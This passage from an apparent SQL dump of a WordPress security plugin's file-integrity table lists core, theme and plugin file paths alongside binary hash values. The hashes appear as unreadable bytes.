�V7{WI\rH','wp-includes/blocks/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','էL\n�8���{s���','x�\Z�R�>ؼ�:�@3�W@f�e�f����L�','',0,'?'),('�y�0H�#;�e\n\"�+','wp-includes/js/dist/server-side-render.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�eQǔ;-P7�苛�d','rP���^�ç\Zx~�;�����\"�x]43s','',0,'?'),('�{K~�ղ���Ų��ۨ','wp-content/themes/twentytwentyone/assets/sass/05-blocks/gallery/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���k&���}�;1','�.v;�q��]�m�,�\\ؔ���Zr�.�\n{','',0,'?'),('��:�6d�e\'O','wp-content/themes/twentynineteen/sass/site/secondary/_widgets.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ӟ=:&��$.���W`vI','�u����y�Һ\0v�&�%�0)^�\ZA�6�','',0,'?'),('��Za9�U�z��ն','wp-includes/class-wp-date-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�U��	�L]-�Rs�@�','ֲP4]���!	o3\n��l���Q�0�','',0,'?'),('��ĸ:�,p�1��Hr','wp-admin/js/dashboard.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C��)�{)�%�','�{G���\n�<Q�IO�	���%�k���%','',0,'?'),('��:}�\0\\,�UP�E','wp-content/themes/magazine-hoot/hybrid/extend/customize/control-group.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���#RG!���qa;Ր}','+0�H)12:L;�}�ت�Ccf�%x�Y�	�i1','',0,'?'),('�\0��וoxi3%\r+]kg','wp-admin/images/post-formats.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K���\0���%3���','9ƺ�&�]��n�Eu��a]iF���Ƴ�','',0,'?'),('�\rSL<�8\0_��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-general-init-tasks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ns(�y��\Z�l#�$','&���Q/�HT]���Պ�p�}��|e�ZVq9','',0,'?'),('�0�;�-,�A�Ey�','wp-includes/theme-compat/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�S��;��I��(','���U�kx�r��Lb�\"��JAF�(u;	\0�&','',0,'?'),('�B��\"^I\n���hƜ','wp-includes/js/dist/dom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ϗL\'n��f\\��FFE','�[J`aq�ݭNc�;���eȜR��\Z�p.�','',0,'?'),('�Iie�b1o4#��b','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-database-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#���j�ֺ�~�9&�','U?	��y�d��u�{m 5œ�3��>�՛�\n�\n�','',0,'?'),('�O�u�6��o�G��','wp-content/plugins/wp-cerber/assets/flags/lr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�a�!^KG�C �,�','b쁣������=Q��*���IGTG	�!]E��9','',0,'?'),('�a�Oj\'�ŻD*ցV4','wp-cron.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&�>F�m8ɃK`�','hi��g��F���-��	0&������yl�','',0,'?'),('�i���5�ֈ6��J�=�','wp-content/themes/magazine-hoot/include/admin/images/sidebar-none.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1e�#�# eԢ��G�','�J�=~L	&�L�we��zܦe�H�L��','',0,'?'),('�m�5^���u��9>','wp-content/plugins/wordfence/views/blocking/option-bypass-cookie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zy���.^�(/t�t','�6�/|�\'��kI7Yҝ���8~l�	�H���6','',0,'?'),('�tM�&�x�V�����','wp-content/themes/twentytwentyone/assets/sass/05-blocks/_config.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2�142�%��F��)�','هO�x�,�{e>�z�Ɂ���s����2C��ܳ','',0,'?'),('�#�\' �~����/z�F','wp-content/plugins/wordfence/modules/login-security/views/manage/regenerate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ޜ�t�j̥<�','�������T����	?W��E>}�u���+��','',0,'?'),('�e�\\�k�c��Xf','wp-includes/customize/class-wp-customize-upload-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ؓ�B8�?)ivr��`-�','�~t~��X���% ��K/3-n6\0�RB�֨G�','',0,'?'),('��m�z\Z��r�9C��','wp-content/themes/magazine-hoot/include/admin/images/sidebar-narrow-left-left.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j7X���Q��v�,$B','��C?�o}�����ٯ���fk[��l�?���F','',0,'?'),('��q�82��v�&#M','wp-includes/js/tinymce/plugins/wpview/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j5q��S\rX���i��','Ej\Z��\Z�I���3J��G�jVݒ��6<S�9P','',0,'?'),('��H�����%��,��','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_cc0000_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|��%;w���Q�8��@','wi>�6�Ƭ�4��.N�C���\Z�4�IO��','',0,'?'),('���<kUJv%��1��','wp-includes/fonts/dashicons.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7����|�����Z','�D��D+ve�h��s>���Z�fo��vW�~,=','',0,'?'),('���#�iJ�H�?�@�','wp-includes/class-wp-http-curl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S�`3F�O�,;N#���','��@�� ����T��(�\nD�ڠ��Y��	�]�2','',0,'?'),('�w����V���!�','wp-admin/includes/class-wp-ms-themes-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{��8�����Lk�5�Ѕ','�\'�<o��\'.��G�\"��v�2gwi̋\0','',0,'?'),('�\Z�K�^���\n�','wp-includes/blocks/image/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�s�d\'���+h���','�,)�\Z����Z8��u�A�,i^���bes�t','',0,'?'),('�^ۛ�������F','wp-content/themes/twentytwenty/assets/css/editor-style-block-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H\0���8x��^��B','}߮�Y���+�H	ܥ`�֒�#�ʅx�-�6','',0,'?'),('�z^}��¤hh3\r��w','wp-content/plugins/wordfence/images/options.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V��Ѵ����A�','D:�bw�#^����4�B�KIP�?	z�n�V�_','',0,'?'),('䆮G*�~�5H���I','wp-includes/js/dist/vendor/wp-polyfill-dom-rect.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��lS?,�ra�4;�^F','�D�;�䏑��eH�i�b�\Z�?�b����','',0,'?'),('䗦���L��z/��%','wp-content/plugins/wordfence/modules/login-security/css/font-awesome.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N��2J娳�YB瘱�','\ZP�L㨒���Zi�t�A�������7d�','',0,'?'),('����zpKC�{\\>��','wp-admin/js/dashboard.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VP�k��\Z��l(�','/S�\0�\\��T��Z��OL\\3aˑ���','',0,'?'),('���1�]�M|�K�FZ','wp-content/plugins/wordfence/lib/wfBulkCountries.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9	+Oyծ�urO�3�\n','X&o1\'�cg��ml��yS����t�����\r','',0,'?'),('�\00��q�ĊNy)��','wp-includes/plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�v/�M��;�7/N:','AI�OZl���wC�fj�@�r}���H!ѧ�Q','',0,'?'),('�\'�`F̔�~�Ė��','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/view.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C���؍��0�+C����','`>&i(Ź���C���f���&���>Y\"�','',0,'?'),('�4����m�T曢�A','wp-content/plugins/wp-cerber/assets/flags/cx.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^�f��mW}}]�','db\'f-�LZ�\0g �]��_��׭\'���o','',0,'?'),('�C�Ǵ��k�q{.L','wp-includes/js/dist/block-serialization-default-parser.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4��ņ��%ٔ2����','����H��l�Eb?�y̥l�N��+��6x�3m','',0,'?'),('�H��4�.\\�:��#��','wp-admin/css/l10n.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+.�[H\rϬ.k��/ ','�������lg����j-u��\\$?���)\\�y6@','',0,'?'),('�R��5?�- S�^H��','wp-admin/js/editor-expand.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���K�\\(��p���[','���;W#�}Gj�[��K�SAKZ�iˤ[Q4c\n','',0,'?'),('�eŐ��n���A�','wp-content/plugins/wordfence/lib/wfView.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�ܺ�-ˆN\n�\\�nO','x�2Q����mk٫@IFRh�Hu~�R8�\"z�K4�','',0,'?'),('�f˴��Χ�H�����','wp-content/themes/magazine-hoot/template-parts/content-archive-block3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Xm��s|�B S5�','�:�邎��	�~q�X5d�Ec!V�����J�','',0,'?'),('�wʼnZ��-��\n��r','wp-content/themes/twentytwentyone/assets/sass/05-blocks/file/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�c�\Zම#\Z֭','��|N�\0��a69�A��1N�%+���','',0,'?'),('���5�1Q�?�_��','wp-includes/https-migration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s9�4W#2��!H�߾�','2�|P��Ł�muН���~k��37rz0�x�A�','',0,'?'),('峳$� @z6�\0`��/�','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ջ}��B��H��71','��\"�beTb�$����׉�\n���~�ln��','',0,'?'),('�\r�b\\��ɍ�\Z��','wp-admin/edit-form-advanced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-gP\"	�P+Pg��h','����b�$磷#�6��Db˓���Z����4l(','',0,'?'),('�+���.��eF��','wp-admin/css/dashboard.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']��w.��Ş1->�QY','�}5�X_Kr�Oe�鎜��g�i�v��\Z8��','',0,'?'),('�6�n��[l��v񺦼q','wp-content/plugins/wp-cerber/assets/flags/bl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('�9e���kk�R�o���S','wp-includes/embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V\Z���/}ͳYM=��','6K�(|�/�R��̵�;$.�Jf8{�v�G�','',0,'?'),('�G��5�@����07��','wp-includes/images/blank.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ʟg��h�kK��f','>��E�G��L�� E��JQ���|�B���ij�','',0,'?'),('�J~_o�f�k�����','wp-includes/js/wp-embed.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R%�qU�0�8}_��','ޚT�d����U�2#*_�D�WQT�n�I%Ǭ�','',0,'?'),('恴L�ޠe���/�u�','wp-content/plugins/wp-cerber/assets/scanner.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g#z���w���l\n\'�','�q��̇P�I��.K�{r�P��|��F\n�m','',0,'?'),('様��7�^�b�\"�','wp-content/plugins/wordfence/images/back_disabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h���g��i���>','�䏛N�7�g΋�?�Fb!}��ݿ��C��鳇','',0,'?'),('��ߖ-r\n��t5�E','wp-content/themes/magazine-hoot/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[����`���4ۓ�','biwԣ��kB�R�\\��Zm���\'f�','',0,'?'),('�y�l��s�U>�<��','wp-includes/css/customize-preview.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��b���Sb�s��\"','ߌ��I�R�\\Ĺ�e��z3�QsC����Q�','',0,'?'),('����eҕ�h�V�\"�','wp-content/plugins/wordfence/views/options/block-controls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���A�PK���.ٳ�\r','�+�>�����U��a`.4m킳+����U','',0,'?'),('��W���\"���Sk:�','wp-admin/images/align-center-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���-�r�5*J7�If','�8tf�*Jw�T�^��H�>���1�JD�ο','',0,'?'),('����P�IcD��ƾ�','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_int.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����J�s��Ǚ�B','��ER��Jb�ȸI\"��t�],�qP�1\\fD','',0,'?'),('����x*�ñ�U���','wp-includes/block-patterns/two-images.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&��_�w?V�:�g��C','w@�c|�h�(��Hz�X[�_�:�x��0�)K','',0,'?'),('�⣣�M�O����U�','wp-admin/js/editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����I=k\Z���','�\\\\^�*k,;�_4�\'� oiU��@&e��','',0,'?'),('���\"�LJ1�C4ND�','wp-content/plugins/wordfence/views/scanner/issue-wfPluginAbandoned.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0ӝ�w�Yh�,�*�','�`c��LX����6��Im � B�]se��f�','',0,'?'),('���;�W����l�','wp-includes/js/dist/deprecated.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B�v\"}	�H���}��T','5\r�_��I��h�MJuk��Q�ͣ�չ���zn','',0,'?'),('�]:]6Q(s-�B��','wp-content/plugins/wp-cerber/assets/flags/so.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9�:�vU:{��','I���˱��	-���f�rǏc�k��@�3�`	=','',0,'?'),('�\n`m�H�I�i�M�','wp-content/themes/twentynineteen/inc/color-patterns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�4�\Z���M��y','_{��g�g�|n�%�e��~�����sCi���B','',0,'?'),('�\"�ơ���7vs+�','wp-admin/includes/class-pclzip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9MY�^mluRg','\0\rhV!\Z7\Z�虁�K`2�_\\H	��G\n�;=','',0,'?'),('�Djמ�8]fД_�','wp-includes/class-wp-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�� �B��Ի��','���/�����0�=�|{h��n�R�','',0,'?'),('�b`K�\'��컜���K','wp-includes/functions.wp-scripts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|�4ؒT�$�0B-�','x�89@��G��#���G�b}y\'�A����v','',0,'?'),('�x�Δ)NX3u/@�4Y�','wp-includes/rest-api/endpoints/class-wp-rest-block-types-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N���>�EH�I��� �','u).H����� �����C���HsԐ`$�','',0,'?'),('�z=��>Mx�<>�֔','wp-content/themes/magazine-hoot/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�i�z4��\rT�\\G�','���F�}�Ռ���O�X����	#����#�','',0,'?'),('�;\Z�_���������','wp-content/themes/magazine-hoot/include/admin/images/premium-backgrounds.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�ڤ���mҁ8w꥘','\Z)������������_�#�6Z\0ė���u�','',0,'?'),('�J��ёe�\rXd��$�','wp-includes/class-wp-customize-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,���^Oި�����','�K�WC�-�v�l�w� ��R\Z�xS)[R�','',0,'?'),('�ҘG\"��:0�\\�KH#','wp-content/themes/twentytwentyone/assets/sass/style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CUZJ�k�\r=�q\'��','Pc����:�D3yN�o&�t*Ѱ�[��:kG\'�','',0,'?'),('���K�g���o#�0','wp-activate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�#w:m���2��A\"','���^>�*���r���I+��{�ф�U�b�&�','',0,'?'),('�ʼn�	i��/Э','wp-includes/formatting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��H(@q���Tj��','�g��\n?#��\'^�\'d�8�\Zi��=\Z������','',0,'?'),('��H���l��{!D#�!','wp-admin/js/color-picker.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�pgG��&�3�,�','S����<�`�J��=�4mS�\"kY��Mׂҡ�','',0,'?'),('���L�.dDv��','wp-content/plugins/wordfence/views/scanner/issue-wpscan_directoryList.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i�0�j8�2\n�s�','v��\\qY{S��<|+��{�(m��?)��D�=�','',0,'?'),('��F�ZY��C8��3E','wp-admin/css/colors/blue/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'��ٳ���v�2.','�ڷ���Rkd�NZ��h��V�\r�<p���=1','',0,'?'),('��÷�g$�M�s�','wp-content/plugins/wordfence/views/waf/option-rate-limit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)YMˍ�\\Ξ��\'','*�eG�P$����б�աmw&��:OL/1>N','',0,'?'),('�۸����B-U�J�','wp-content/themes/magazine-hoot/hybrid/extend/images/patterns/3.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��6��\'K�C�;�','eTy�r��-�.��C�	L?W�i�_Sl�k','',0,'?'),('�%y�>}H�o��(6','wp-includes/js/jquery/ui/core.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�g{����!�S{5�','�e��%�h�\\f���軙tuv�����R','',0,'?'),('�SHLenP�q7�č�','wp-content/plugins/wordfence/views/scanner/issue-control-edit-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�����`�j|��y�','i��OGi����F|4�8��V��j�\n#V-L','',0,'?'),('�f�i�`�=@T��o�','wp-admin/images/spinner.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L�\nD�\n�oً�j˲�','zƄ�\Z\"��n\Zs�(�U�/~�7��F��^…�','',0,'?'),('�wj0��67���@�T','wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�2s7��\\�i#��E','a������t��W��	�3N�\Z��`x�hI�`�','',0,'?'),('�J���y��0m�`�/','wp-includes/class-IXR.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0���C`q�x�',']���z�p��q�N\"CKW��鴛��c��M','',0,'?'),('�\0�]�p��ޑ�	\rG','wp-admin/css/customize-nav-menus.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����+�D�8rnlU��','�U����2��#d�{���3��E8���U�','',0,'?'),('��tU;�56|�4Ql','wp-content/plugins/wp-cerber/assets/select2/dist/js/select2.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���|Ԋ2�3�\\�:=�','��	�<�(*Wv���Ћtw��r_��t�i�	','',0,'?'),('��v�w\n�s�̨H5�','wp-content/plugins/all-in-one-wp-security-and-firewall/js/password-strength-tool.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\ZNj�ک&��U��','B+1�E��}�n�7\Z�z�_��Q�̻�3�&','',0,'?'),('���W����:��]','wp-includes/js/dist/primitives.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���-�v��t��(4V','���a��_��Lx�c$��tU�v�����%��','',0,'?'),('���Q�o�H*���(�','wp-content/plugins/wordfence/images/sort_asc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��I��+ƾ��=��','d�C�T�����e&,)Ѵ��FG�\Zd�ON�','',0,'?'),('�+����3�pU','wp-content/plugins/wordfence/lib/wfOnboardingController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�%�̍��ų�<��','ŔWF&�x\Z	�\"�g��ߠ���;�=�D�ٗx','',0,'?'),('�\"�e��–AlB�E�/','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-gallery.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vh�lZ��.�]m`q��`','Ȧ(�{r�E�(ug�_	ܹ k��\rP�`�8�c�','',0,'?'),('�F�j!Y�{.J=,��','wp-admin/images/stars.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[����><�k�{��(�','/	��\"���Fa챔<SY��g���؉F��@','',0,'?'),('�]�W/>�}<8� VF�','wp-admin/includes/theme.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6*pO��,ё� -X�','�4|ǛD}c�Hd�Ɖ)Y[�q�K���-�','',0,'?'),('�^.�jT}�<��I��','wp-admin/js/accordion.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j0�P�3#��','!K~�f���nN��B��\0��.@�K�U�','',0,'?'),('�b,��d���xh�Eo','wp-content/themes/magazine-hoot/js/jquery.superfish.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˵�ˆ7�){�?`Q+�','�a��ӡ�	�p�����\Z�k��5�r��','',0,'?'),('�g���U)\rR(�','wp-includes/js/dist/is-shallow-equal.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���	�\n�f@�!릶','wNT(��`x܌�P�C��1Ow�b�]��ъ�','',0,'?'),('�|:��x�Z~�*�wl�','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n����[f��0�=G�','�[G�f����N����	rG�Ƭ���.','',0,'?'),('�T�B3��G��{','wp-includes/Requests/IPv6.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��K�N���knT�','�=��ln&�����ă�J�ӗ���~�����l','',0,'?'),('頻�yN<���9�o\Z<','wp-admin/js/xfn.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/�\'����>�Y�','�b*/��m/���a�ŵ�>��I湒h��+','',0,'?'),('��m�Mt���W�B','wp-admin/images/align-left.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�y0�d�Z�o.h��','�_]�<#�S�\"�B^U4_�Q<!@�x?J$��K�','',0,'?'),('����t���Z�O\'� \n','wp-includes/js/thickbox/macFFBgHack.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ȱg�W�,/u�','Rw�/�h��&q��]Z��_����Ngy��','',0,'?'),('����V,E@�X���y','wp-includes/SimplePie/Cache/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P��8?Q��h׊�','~�`��嫌�<��B\n鲙%]��X}\Zi��','',0,'?'),('�	�1_E�67���','wp-content/themes/twentynineteen/sass/forms/_buttons.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a|2]�e�\"$9z�','\0�Ó\rƱ6� �,�J	��!d7���n��h��','',0,'?'),('�U���b�f܌�`g','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-registered-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[m�L̉Ȗ�j#�D','�����ۚr(o�Ek\"+/bW/r���p��1','',0,'?'),('�kLN\0��x6@','wp-admin/css/list-tables.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�UݪAcT�g�@��{N','�XAݸ.`Q��rC����w@�4b�X���ϭ�	','',0,'?'),('�-.��x�ɤ�R��','wp-admin/includes/privacy-tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A�/��nC�0^`���','Y\'C5�\'g�u���**Ƭy�%R(�T�S����','',0,'?'),('�0J����fx�#X{�','wp-includes/sodium_compat/namespaced/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�m�w�/�\\�y5�','�ɐt�d7�H�}=��.t��Cw$�`c��\'�','',0,'?'),('�4���2�)A.;4�','wp-includes/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3Q	�!�@�٧T\r','	�Z\\L���\'b�%�i$���\Z\n���F�~','',0,'?'),('�Q�A�	�=H��7-','wp-includes/js/jquery/ui/droppable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/���_\na��G���','m�U\'mU�7m�N���EFDg;�N�q��~�','',0,'?'),('�d\n�v;�O1:���,Tn','wp-content/plugins/wordfence/views/options/option-toggled-multiple.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A\Z����w�d6[�','!��yq�� �����	������#ҝ;\'','',0,'?'),('�r@��D��Z�䯩','wp-includes/sodium_compat/namespaced/Core/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!K�	5y���S*','���Ty�O�%u;�U�}�g�1��)��Z�','',0,'?'),('ꍥ��2jEbg؈W�x�','wp-includes/css/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A^�I���4�B\'','ɗ(�|��m��F�EHS7��^��~#����','',0,'?'),('ꐏF�rH�}@$bF��-','wp-content/plugins/wp-cerber/assets/flags/dz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}����Z�A���','~\n����Ào�\'�x�\0��Xh.��}���%�','',0,'?'),('�LJ���4˓T`�k','wp-includes/js/wp-pointer.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�%��iهkm���','U�Xu��LJ�)G,i��m����5�_��MT_','',0,'?'),('���`I��,�y o�Y','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��8e_�T��ƽW','ݬ�IS�P\"�a�� 7J�6�QSv���_��y�','',0,'?'),('��6�Z�fM���;�','wp-admin/css/site-health-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ˈ0@�8�����_B','�r�dy��#�G޿����}����ZӦtwW�S','',0,'?'),('�\njݍea!�\ZWd�q','wp-includes/rest-api/fields/class-wp-rest-post-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"<8���.���K�\'',' \ZYӵ�˼*�,Q�L�Y{�㬣p�\r�h���','',0,'?'),('��u��2e��-&\0','wp-content/themes/magazine-hoot/include/admin/images/content-block-style-3.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k��Q$\0%}G򫱣','TK|=*Ӹ\'\'iq��#��:#�D[S�X0=��','',0,'?'),('�-n�$.�#g%�}�','wp-content/plugins/wordfence/lib/Diff/Renderer/Html/SideBySide.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �OّCH�ؖs� ','pX���uc{�-�K׏ژ�/OnE0���)JB','',0,'?'),('�0���R�J�{y�ˣ��','wp-includes/general-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�lGfBp�X0=�aESy','�qǼ<�x��Ӡ�A��X/rUCG�lW�\n*e','',0,'?'),('�F �8�+�)��r�P�','wp-admin/images/no.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k�d�$��ܟV7�','\n�>���~h�Z���P\0�U0�;\' {�)	�>','',0,'?'),('�M\Z���H�?ͲZ','wp-includes/class-wp-rewrite.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c���x�X��C��u%#','ݐ/#N`j�R�1�t+��s�W�]�~S���mǗ','',0,'?'),('�Oӿ�;�=\\J�zy','wp-includes/js/tinymce/plugins/wpgallery/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cdxo&l�g�8�3��','�h_�8��r0�y-��\nϥ��KL-� {','',0,'?'),('�QF�0t�+�����','wp-includes/css/dist/block-library/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����{`�q���\'2P','Wf�y�����7hc��ajkgd�4��8�ɢ��','',0,'?'),('�a��u\"9s?�H����','wp-content/plugins/wordfence/lib/WFLSPHP52Compatability.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%1�s���ËG','E��Wٳ�?�4��@U?�0���bP�+�h','',0,'?'),('�s��Zz�`x�mf: ','wp-content/themes/twentytwentyone/assets/sass/01-settings/global.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v���]��c��ț